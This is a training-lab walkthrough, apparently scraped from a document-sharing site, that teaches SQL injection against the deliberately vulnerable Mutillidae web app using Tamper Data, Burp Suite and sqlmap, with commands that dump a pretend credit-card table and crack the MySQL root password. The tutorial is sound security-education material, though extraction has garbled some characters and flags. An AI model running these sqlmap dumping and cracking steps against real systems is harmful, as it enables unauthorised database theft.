Mutillidae - Lesson 12 - SQL Injection With Sqlmap, Tamper Data & Burpsuite

12/4/2016 Mutillidae:
Lesson 12: SQL Injection with sqlmap, tamper data & burpsuite
ComputerSecurityStudent (CSS) [Login] [Join Now]
HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US
|SECURITY TOOLS >> Mutillidae Project >> Mutillidae 2.5.11 >> Current Page |Views:
9179

(Mutillidae: Lesson 12)

{ SQL Injection with sqlmap, tamper data & burpsuite } Help
ComputerSecurityStudent
pay for continued
research,
Section 0. Background Information resources & bandwidth

What is Mutillidae?
OWASP Mutillidae II is a free, open source, deliberately vulnerable
webapplication providing a target for websecurity enthusiast.
What is a SQL Injection?
SQL injection (also known as SQL fishing) is a technique often used to
attack data driven applications.
This is done by including portions of SQL statements in an entry field
in an attempt to get the website to pass a newly formed rogue SQL
command to the database (e.g., dump the database contents to the
attacker). SQL injection is a code injection technique that exploits a
security vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly
filtered for string literal escape characters embedded in SQL
statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for
websites but can be used to attack any type of SQL database.
What is sqlmap?
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking
over of database servers. It comes with a kickass detection engine,
many niche features for the ultimate penetration tester and a broad
range of switches lasting from database fingerprinting, over data
fetching from the database, to accessing the underlying file system
and executing commands on the operating system via outofband
connections.
What is tamper data?
Tamper Data is a Firefox Extension which gives you the power to view,
record and modify outgoing HTTP/HTTPS requests (headers and post
parameters).
PreRequisite Lab
1. Mutillidae: Lesson 1: How to Install Mutillidae in Fedora 14
Note: Remote database access has been turned on to provide an
additional vulnerability.
2. BackTrack: Lesson 1: Installing BackTrack 5 R1
Note: This is not absolutely necessary, but if you are a computer
security student or professional, you should have a BackTrack VM.
3. BackTrack 5R1: Lesson 11: How to Enable Tamper Data
Note: Tamper Data comes with Firefox on BackTrack 5 R1, but it is
not enabled.
4. Mutillidae: Lesson 8: SQL Injection Union Exploit #1
Note: This lab contains a detailed foundation surrounding the
union exploit.
Lab Notes
In this lab we will do the following:
https://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson12/index.html 1/31
12/4/2016 Mutillidae: Lesson 12: SQL Injection with sqlmap, tamper data & burpsuite
1. Due to a purposeful bug in the index.php code, we will tamper data
to positive test for an SQL vulnerability without generating an
error.
2. We will capture a HTTP POST Request from burpsuite.
3. We will use sqlmap to view pretend credit_card contents.
4. We will use sqlmap to view username and password information.
Legal Disclaimer
As a condition of your use of this Web site, you warrant to
computersecuritystudent.com that you will not use this Web site for
any purpose that is unlawful or that is prohibited by these terms,
conditions, and notices.
In accordance with UCC § 2316, this product is provided with "no
warranties, either express or implied." The information contained is
provided "asis", with "no guarantee of merchantability."
In addition, this is a teaching website that does not condone
malicious behavior of any kind.
Your are on notice, that continuing and/or using this lab outside your
"own" test environment is considered malicious and is against the law.
© 2013 No content replication of any kind is allowed without express
written permission.
Section 1: Configure Fedora14 Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit Fedora Mutillidae Virtual Machine Settings
Instructions:
1. Highlight Fedora14 Mutillidae
2. Click Edit virtual machine settings
3. Edit Network Adapter
Instructions:
1. Highlight Network Adapter
2. Select Bridged
3. Click the OK Button
Section 2: Login to Fedora14 Mutillidae
1. Start Fedora14 VM Instance
Instructions:
1. Start Up VMWare Player
2. Select Fedora14 Mutillidae
3. Play virtual machine
2. Login to Fedora14 Mutillidae
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Section 3: Open Console Terminal and Retrieve IP Address
1. Start a Terminal Console
Instructions:
1. Applications > Terminal
2. Switch user to root
Instructions:
1. su root
2. <Whatever you set the root password to>
3. Get IP Address
Instructions:
1. ifconfig a
Notes (FYI):
As indicated below, my IP address is 192.168.1.111.
Please record your IP address.
Section 4: Configure BackTrack Virtual Machine Settings
1. Start VMware Player
Instructions
1. For Windows 7
1. Click Start Button
2. Search for "vmware player"
3. Click VMware Player
2. For Windows XP
Starts > Programs > VMware Player
2. Edit the BackTrack5R1 VM
Instructions:
1. Select BackTrack5R1 VM
2. Click Edit virtual machine settings
3. Edit Virtual Machine Settings
Instructions:
1. Click on Network Adapter
2. Click on the Bridged Radio button
3. Click on the OK Button
Section 5: Play and Login to BackTrack
1. Play the BackTrack5R1 VM
Instructions:
1. Click on the BackTrack5R1 VM
2. Click on Play virtual machine

2. Login to BackTrack
Instructions:
1. Login: root
2. Password: toor or <whatever you changed it to>.
3. Bring up the GNOME
Instructions:
1. Type startx
Section 6: Open Console Terminal and Retrieve IP Address
1. On BackTrack, Start up a terminal window
Instructions:
1. Click on the Terminal Window

2. Obtain the IP Address
Instructions:
1. ifconfig a
Note(FYI):
My IP address 192.168.1.109.
In your case, it will probably be different.
This is the machine that will be use to attack the victim machine
(Metasploitable).
Section 7: Navigate to "View Someones Blog"
1. On BackTrack, Open Firefox
Instructions:
1. Click on the Firefox Icon
Notes (FYI):
If FireFox Icon does not exist in the Menu Bar Tray, then go to
Applications > Internet > Firefox Web Browser
2. Open Mutillidae
Notes (FYI):
Replace 192.168.1.111 in the following URL >
http://192.168.1.111/mutillidae, with your Mutillidae's IP Address
obtained from (Section 3, Step 3)
Instructions:
1. http://192.168.1.111/mutillidae
3. Go to View Someones Blog
Instructions:
1. OWASP Top 10 ‐‐> A1 ‐ SQL Injec on ‐‐> SQLMAP Prac ce ‐‐> View Someones Blog
Section 8: Positive SQL Injection Test
1. Activate Tamper Data
Instructions:
1. Tools > Tamper Data
2. Start the Tamper
Instructions:
1. Click on Start Tamper
3. View Blog Entries
Instructions:
1. Select "admin" from the drop down menu
2. Click on the View Blog Entries
4. Tamper with request?
Instructions:
1. Click on the Tamper Button
5. Modify Post Parameter Values
Instructions:
1. Replace admin with ''
Where there are two single quotes (').
Remember to put a space after the last hyphen ().
2. Click the OK Button
Note(FYI):
1. The goal of submitting '' to the webpage form is to produce
empty results without triggering an error.
2. Some web administrators have automated alerts that are triggered
from application and database log errors.
3. So in this case, we now know a SQL injection is possible, without
creating an error.

6. Close Tamper Data
Instructions:
1. Click the X to close Tamper Data
Note(FYI):
1. We are closing Tamper Data, because we no longer need to tamper
with any HTTP POST REQUESTS.
2. Continue to Next Step.
7. Viewing the Results
Note(FYI):
1. Notice 0 records where returned.
2. This test was positive, because it did not trigger any errors, but
it did produce the column headers if results were to be returned.
Section 12: Configure Firefox Proxy Settings
1. View Preferences
Instructions:
1. Edit > Preferences

2. Advanced Settings...
Instructions:
1. Click on the Advanced Icon
2. Click on the Network Tab
3. Click on the Setting... button
3. Connection Settings
Instructions:
1. Click on Manual proxy configurations
2. Type "127.0.0.1" in the HTTP Proxy Text Box
3. Type "8080" in the Port Text Box
4. Check Use the proxy server for all protocols
5. Click OK
6. Click Close
Section 13: Configure Burp Suite
1. Start Burp Suite
Instructions:
1. Applica ons ‐‐> BackTrack ‐‐> Vulnerability Assessment ‐‐> Web Applica on Assessment ‐‐‐> Web

Applica on Proxies ‐‐> burpsuite

2. JRE Message
Instructions:
1. Click OK
3. Configure proxy
Instructions:
1. Click on the proxy tab
2. Click on the options tab
3. Verify the port is set to 8080
Section 12: Capture Post Parameters with Burpsuite
1. View Blog Entries
Instructions:
1. Select "admin" from the drop down menu
2. Click on the View Blog Entries
2. Copy Post Parameter
Instructions:
1. Highlight all the text.
2. Right Click on the Highlighted text.
This will create menu list.
3. Select Copy.
3. Open gedit
Notes (FYI):
gedit is a UTF8 compatible text editor for the GNOME desktop
environment, Mac OS X and Microsoft Windows.
Instructions:
1. gedit /pentest/database/sqlmap/burp.txt &
4. Save File
Notes (FYI):
The Edit>Paste feature does not work from burpsuite; therefore,
you will press the <Ctrl> and v keys to paste.
Instructions:
1. Press the <Ctrl> and v keys to paste.
2. Click the Save button
Section 13: Using sqlmap against Mutillidae
1. View Databases with sqlmap
Instructions:
1. cd /pentest/database/sqlmap
2. grep "Referer" burp.txt | awk '{print $2}'
3. grep "author" burp.txt
4. grep "Cookie" burp.txt | sed 's/Cookie: //'
5. ./sqlmap.py u "http://192.168.1.111/mutillidae/index.php?page=viewsomeonesblog.php"
data="author=admin&viewsomeonesblogphpsubmitbutton=View+Blog+Entries" cookie="showhints=0;
PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" dbs
Replace 192.168.1.111. with Mutillidae's IP address obtained
from (Section 3, Step 3).
Replace the following cookie string showhints=0;
PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24 with the cookie obtain from the
Step 4 above.
2. View Database Results
Instructions:
1. Do you want to keep testing the others? [y/N] N
2. Notice the databases sqlmap returns.
3. View nowasp database tables
Instructions:
1. Press the UP ARROW to display the previous command
2. ./sqlmap.py ‐u "h p://192.168.1.111/mu llidae/index.php?page=view‐someones‐blog.php" ‐‐
data="author=admin&view‐someones‐blog‐php‐submit‐bu on=View+Blog+Entries" ‐‐
cookie="showhints=0; PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" ‐D nowasp ‐‐tables
Notes (FYI):
1. ‐D nowasp ‐‐tables, display the nowasp database tables.
4. View table results with sqlmap
Note(FYI):
1. Notice the 11 nowasp tables
2. Notice there is a credit card table.
5. Retrieve credit_cards table contents
Instructions:
1. Press the UP ARROW to display the previous command
2. ./sqlmap.py u "http://192.168.1.111/mutillidae/index.php?page=viewsomeonesblog.php"
data="author=admin&viewsomeonesblogphpsubmitbutton=View+Blog+Entries" cookie="showhints=0;
PHPSESSID=6lmbhjodbtnj6o5ajuli7p1s24" D nowasp T credit_cards dump
Note(FYI):
1. D nowasp T credit_cards dump, display the credit_cards table content.
6. Review credit_cards table results
Instructions:
1. Do you want to use dictionary attack ... [Y/n/q] n
2. Notice the pretend credit card numbers.
Section 14: Using sqlmap Load HTTP request from a file
1. View Databases with sqlmap
Instructions:
1. ./sqlmap.py r burp.txt dbs
Note(FYI):
1. r, This option is very kool. It allows you to use the burpsuite
file we saved in (Section 12, Step 4), instead of using the u,
data, and cookie options.
2. dbs, This options displays all the databases.
3. I guess I could of showed you this option earlier, but good things
come to those who wait.
2. View Databases results
Note(FYI):
1. Notice that all the databases are displayed similar to (Section
13, Step 2).
2. The mysql database contains important internal tables including
usernames and passwords.
3. View tables with sqlmap
Instructions:
1. ./sqlmap.py r burp.txt D mysql tables
Note(FYI):
1. D mysql tables, This option displays the mysql database tables.
4. View tables results
Note(FYI):
1. Notice all the tables for the mysql database are displayed.
2. The user table contains all the usernames and passwords for each
database.
5. View user table contents with sqlmap
Instructions:
1. ./sqlmap.py r burp.txt D mysql T user dump
Note(FYI):
1. D mysql T user dump, This option displays the content of the
user table in the mysql database.
6. View user table password
Instructions:
1. Do you want to sue dictionary attack ... [Y/n/q] Y
2. What's the dictionary location? <Press Enter>
3. Do you want to use common password suffices? [y/N] N
4. Notice the user is 'root' and the password is 'samurai'
Section 15: Proof of Lab
1. Proof of Lab, (On a BackTrack Terminal)
Instructions:
1. ﬁnd /pentest/database/sqlmap/output/*/dump/mysql ‐name "*.csv" | xargs grep samurai
Search the (/pentest/database/sqlmap/output/*/dump/mysql) path
Search for files with a (*.csv) extension.
Search the .csv files for the string samurai
2. date
3. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions
1. Press both the <Ctrl> and <Alt> keys at the same time.
2. Do a <PrtScn>
3. Paste into a word document
4. Upload to Moodle

Mutillidae - Lesson 12 - SQL Injection With Sqlmap, Tamper Data & Burpsuite

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Mutillidae - Lesson 12 - SQL Injection With Sqlmap, Tamper Data & Burpsuite

Uploaded by

Copyright:

Available Formats

12/4/2016 Mutillidae:

ComputerSecurityStudent (CSS) [Login] [Join Now]

HOME UNIX WINDOWS SECURITY TOOLS FORENSICS SHOPPING GET STARTED CONTACT US

1. Applica ons ‐‐> BackTrack ‐‐> Vulnerability Assessment ‐‐> Web Applica on Assessment ‐‐‐> Web

You might also like